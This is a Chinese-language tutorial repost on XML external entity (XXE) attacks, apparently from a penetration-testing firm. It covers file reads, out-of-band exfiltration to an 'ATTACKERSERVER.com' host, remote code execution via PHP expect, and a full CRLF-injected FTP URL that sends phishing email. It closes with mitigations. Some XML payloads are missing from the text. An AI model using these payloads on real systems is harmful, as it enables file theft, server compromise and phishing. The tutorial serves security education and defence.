热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

从XML到RCE(远程代码执行)

你的web应用是否能够防止XXE攻击如果你的应用程序允许用户执行上传文件或者提交POST请求的操作,那么它就很可能容易受到XXE攻击。虽然说每天都有大量该漏洞被检测到,但Gardien Virtuel

你的web应用是否能够防止XXE攻击

如果你的应用程序允许用户执行上传文件或者提交POST请求的操作,那么它就很可能容易受到XXE攻击。虽然说每天都有大量该漏洞被检测到,但Gardien Virtuel在去年的几次Web应用程序渗透测试中就已经能够利用该漏洞。

 

什么是XXE

XML eXternal Entity(XXE)攻击被列入OWASP 2017年的前十名,并被该组织定义为:

“[…]一种针对解析XML输入的应用程序的攻击。它实质上是另一种注入类型攻击,如果正确利用,可能非常严重。当包含对外部实体的引用的XML输入是 由弱配置的XML解析器处理时该攻击就会发生。这种攻击可能导致从解析器所在机器泄漏机密数据,拒绝服务,服务器端请求伪造,端口扫描,以及其他一些系统影响[如亿笑-Dos攻击]。”

比如说,当你使用PHP的时候,需要将libxml_disable_entity_loader设置为TRUE才能禁用外部实体。

 

漏洞利用介绍

通常情况下,XXE攻击者会创建一个注入XML文件的攻击载荷,执行该载荷
时,将读取服务器上的本地文件,访问内部网络并扫描内部端口。 通过XXE,攻击者能够在本地计算机上读取敏感数据和系统文件,并在某些情况下将其升级为代码执行。 换句话说,XXE是一种从localhost到达各种服务的方法,可能绕过防火墙规则或授权检查。

让我们将下面一段代码作为一个简单的post请求的例子:

POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
COOKIE: myCOOKIE=COOKIEs;
Connection: close
Upgrade-Insecure-Requests: 1



John, Doe

Computers
9.99
2018-10-01
XML is the best!


上述代码将由服务器的XML处理器解析。 代码被解析后返回:

{"Request Successful": "Added!"}

这时候当攻击者试图滥用XML代码解析时会发生什么?让我们来编辑代码,让它包含我们的恶意载荷:


]>


John, Doe

Computers
9.99
2018-10-01
&xxe;


这段代码会被执行并且返回

{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...

 

盲带外XEE(Blind OOB XXE)

如上例所示,服务器将/etc/passwd文件的内容作为响应返回给我们的XXE。 而有些情况下虽然实际上没有将响应返回给攻击者的浏览器或代理,但服务器仍然可能受到XXE的攻击。盲带外XXE(OOB XXE)将就允许我们以不同方式利用此漏洞。 由于我们无法直接查看文件内容,因此仍可以扫描内部IP,端口,使用易受攻击的服务器作为代理在外部网络上执行扫描并执行代码。

下面将演示4个漏洞利用场景。


场景1 – 端口扫描

在第一个例子中,受到攻击的服务器对我们的攻击返回了响应。 我们使用文件URI方案将请求指向/etc/passwd文件。当然也可以使用http URI方案并强制服务器向我们选择的边界点和端口发送HTTP GET请求,将XXE转换为SSRF(服务器端请求伪造)。

下面的代码将尝试与端口8080通信,并且根据响应时间和/或响应长度,攻击者将知道它是否已打开。


]>


John, Doe

Computers
9.99
2018-10-01
&xxe;




场景2 – 通过DTD进行文件渗透

外部文档类型定义(DTD)文件可用于通过让易受远程攻击的服务器获取攻击者托管在VPS上的.dtd文件,并执行该文件中包含的恶意命令来触发OOB XXE。 DTD文件基本上是充当被攻击服务器的指令文件。

以下请求已发送到应用程序以演示和测试此方法:





John, Doe

Computers
9.99
2018-10-01
&xxe;


上述代码一旦由被攻击的服务器所执行,该服务器就会向我们的远程服务器发送请求,查找包含我们的载荷的DTD文件:


">
%all;

花点时间了解一下上述请求的执行流程。 结果是两个请求发送到我们的服务器,其中第二个请求是/etc/passwd文件的内容。

在我们的VPS日志中可以看到带有文件内容的第二个请求,它证实了OOB XXE:
http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh


场景3 – 远程代码执行

这种情况很少发生,但还是会在一些情况下黑客能够通过XXE执行代码,这主要是由于内部应用程序配置/开发不当。 如果我们很幸运遇到PHP expect模块被加载到易受攻击的系统或正在执行XML的内部应用程序上,我们可以执行如下命令:



]>


John, Doe

Computers
9.99
2018-10-01
&xxe;


响应包:
{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...


场景4 – 网络钓鱼

我们使用Java的XML解析器找到了一个易受攻击的端点。 扫描内部端口后,我们发现侦听端口25的SMTP服务,Java支持在sun.net.ftp.impl.FtpClient中实现的ftp URI方案。 因此,我们可以指定用户名和密码,例如ftp:// user:password@hostport/test.txt,FTP客户端将在连接中发送相应的USER命令。

但这与SMTP和网络钓鱼有什么关系呢? 接下来就是有趣的部分。如果将%0D%0A(CRLF)放在URL的user部分的任何位置,我们就可以终止USER命令并向FTP会话中注入一个新命令,允许我们向端口25发送任意SMTP命令:

ftp://a%0D%0A
EHLO%20a%0D%0A
MAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0A
RCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0A
DATA%0D%0A
From%3A%20support%40VULNERABLESYSTEM.com%0A
To%3A%20victim%40gmail.com%0A
Subject%3A%20test%0A
%0A
test!%0A
%0D%0A
.%0D%0A
QUIT%0D%0A
:a@VULNERABLESYSTEM.com:25

当FTP客户端使用该URL连接时,以下命令将发送VULNERABLESYSTEM.com上的邮件服务器:

ftp://a
EHLO a
MAIL FROM:
RCPT TO:
DATA
From: support@VULNERABLESYSTEM.com
To: victim@gmail.com
Subject: Reset your password
We need to confirm your identity. Confirm your password here: http://PHISHING_URL.com
.
QUIT
:support@VULNERABLESYSTEM.com:25

这样攻击者就可以从受信任的源发送钓鱼(例如:帐户重置链接)电子邮件,绕过垃圾邮件过滤器并降低服务的信任。 在可以从执行XML解析的计算机访问到内部邮件服务器的情况下,这个攻击特别有意思。
友情提醒:它甚至允许发送附件;-)

 

推荐几款有用的工具

现在谈到XXE,重要的是能够随时手动编辑Web请求的内容,BurpSuite是推荐的工具之一。 在某些情况下,BurpSuite的扫描功能可以检测潜在的XXE漏洞,但建议手动利用。 如果你设法利用存在XXE漏洞的系统,BurpSuite的Intruder比较适合自动探测开放端口。 通过查看响应时间/响应长度,就可以快速判断端口是否已打开。

RequestBin和HookBin等HTTP请求分析器可用于测试OOB XXE。 BurpSuite Pro’s Collaborator一般来说可以解决这个问题,但是一些安全研究人员更喜欢使用他们自己的VPS。

 

漏洞应对措施

绝不相信你的最终用户。 在本文中,我们可以发现主要问题是在于XML解析器处理用户发送的不受信任的数据上。大多数XML解析器默认易受到XML外部实体攻击。 因此,最佳解决方案是将XML处理器配置为使用本地静态DTD,并在部署应用程序之前禁用XML文档中包含的任何声明的DTD。

 

参考



  1. https://blog.zsec.uk/blind-xxe-learning/

  2. https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/

  3. https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection

  4. https://mikeknoop.com/lxml-xxe-exploit/

 

XXE相关知识



  1. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injections

  2. https://www.gracefulsecurity.com/xxe-cheatsheet/

  3. https://gist.github.com/abdilahrf/63ea0a21dc31010c9c8620425e212e30

审核人:yiwang   编辑:边边


推荐阅读
  • Webmin远程命令执行漏洞复现及防护方法
    本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法,同时提供了防护方法。漏洞存在于Webmin的找回密码页面中,攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外,还指出了参考链接中的数据包不准确的问题,并解释了漏洞触发的条件。最后,给出了防护方法以避免受到该漏洞的攻击。 ... [详细]
  • Nginx使用AWStats日志分析的步骤及注意事项
    本文介绍了在Centos7操作系统上使用Nginx和AWStats进行日志分析的步骤和注意事项。通过AWStats可以统计网站的访问量、IP地址、操作系统、浏览器等信息,并提供精确到每月、每日、每小时的数据。在部署AWStats之前需要确认服务器上已经安装了Perl环境,并进行DNS解析。 ... [详细]
  • Skywalking系列博客1安装单机版 Skywalking的快速安装方法
    本文介绍了如何快速安装单机版的Skywalking,包括下载、环境需求和端口检查等步骤。同时提供了百度盘下载地址和查询端口是否被占用的命令。 ... [详细]
  • 这是原文链接:sendingformdata许多情况下,我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单,但是 ... [详细]
  • CSS3选择器的使用方法详解,提高Web开发效率和精准度
    本文详细介绍了CSS3新增的选择器方法,包括属性选择器的使用。通过CSS3选择器,可以提高Web开发的效率和精准度,使得查找元素更加方便和快捷。同时,本文还对属性选择器的各种用法进行了详细解释,并给出了相应的代码示例。通过学习本文,读者可以更好地掌握CSS3选择器的使用方法,提升自己的Web开发能力。 ... [详细]
  • 本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]
  • 本文介绍了C#中数据集DataSet对象的使用及相关方法详解,包括DataSet对象的概述、与数据关系对象的互联、Rows集合和Columns集合的组成,以及DataSet对象常用的方法之一——Merge方法的使用。通过本文的阅读,读者可以了解到DataSet对象在C#中的重要性和使用方法。 ... [详细]
  • 本文介绍了在SpringBoot中集成thymeleaf前端模版的配置步骤,包括在application.properties配置文件中添加thymeleaf的配置信息,引入thymeleaf的jar包,以及创建PageController并添加index方法。 ... [详细]
  • 知识图谱——机器大脑中的知识库
    本文介绍了知识图谱在机器大脑中的应用,以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例,说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案,如搜索关键词"Marie Curie",会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革,不仅美国的微软必应,中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]
  • 后台获取视图对应的字符串
    1.帮助类后台获取视图对应的字符串publicclassViewHelper{将View输出为字符串(注:不会执行对应的ac ... [详细]
  • 本文介绍了Web学习历程记录中关于Tomcat的基本概念和配置。首先解释了Web静态Web资源和动态Web资源的概念,以及C/S架构和B/S架构的区别。然后介绍了常见的Web服务器,包括Weblogic、WebSphere和Tomcat。接着详细讲解了Tomcat的虚拟主机、web应用和虚拟路径映射的概念和配置过程。最后简要介绍了http协议的作用。本文内容详实,适合初学者了解Tomcat的基础知识。 ... [详细]
  • 《数据结构》学习笔记3——串匹配算法性能评估
    本文主要讨论串匹配算法的性能评估,包括模式匹配、字符种类数量、算法复杂度等内容。通过借助C++中的头文件和库,可以实现对串的匹配操作。其中蛮力算法的复杂度为O(m*n),通过随机取出长度为m的子串作为模式P,在文本T中进行匹配,统计平均复杂度。对于成功和失败的匹配分别进行测试,分析其平均复杂度。详情请参考相关学习资源。 ... [详细]
  • 在重复造轮子的情况下用ProxyServlet反向代理来减少工作量
    像不少公司内部不同团队都会自己研发自己工具产品,当各个产品逐渐成熟,到达了一定的发展瓶颈,同时每个产品都有着自己的入口,用户 ... [详细]
  • 如何在服务器主机上实现文件共享的方法和工具
    本文介绍了在服务器主机上实现文件共享的方法和工具,包括Linux主机和Windows主机的文件传输方式,Web运维和FTP/SFTP客户端运维两种方式,以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外,还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK,以及主机迁移服务会收集的源端服务器信息。 ... [详细]
  • 延迟注入工具(python)的SQL脚本
    本文介绍了一个延迟注入工具(python)的SQL脚本,包括使用urllib2、time、socket、threading、requests等模块实现延迟注入的方法。该工具可以通过构造特定的URL来进行注入测试,并通过延迟时间来判断注入是否成功。 ... [详细]
author-avatar
推广中医
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有